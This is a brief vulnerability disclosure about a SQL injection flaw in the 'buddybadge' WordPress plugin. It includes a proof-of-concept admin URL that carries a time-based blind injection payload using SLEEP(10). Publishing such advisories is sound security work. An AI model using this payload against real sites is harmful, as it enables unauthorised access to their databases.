The plugin does not sanitise and escape a parameter before using it in a SQL statement, leading to a SQL injection exploitable by high privilege users
https://example.com/wp-admin/options-general.php?page=buddybadge&_wpedit=b2f9b59706&edit=1+AND+(SELECT+7741+FROM+(SELECT(SLEEP(10)))hlAf)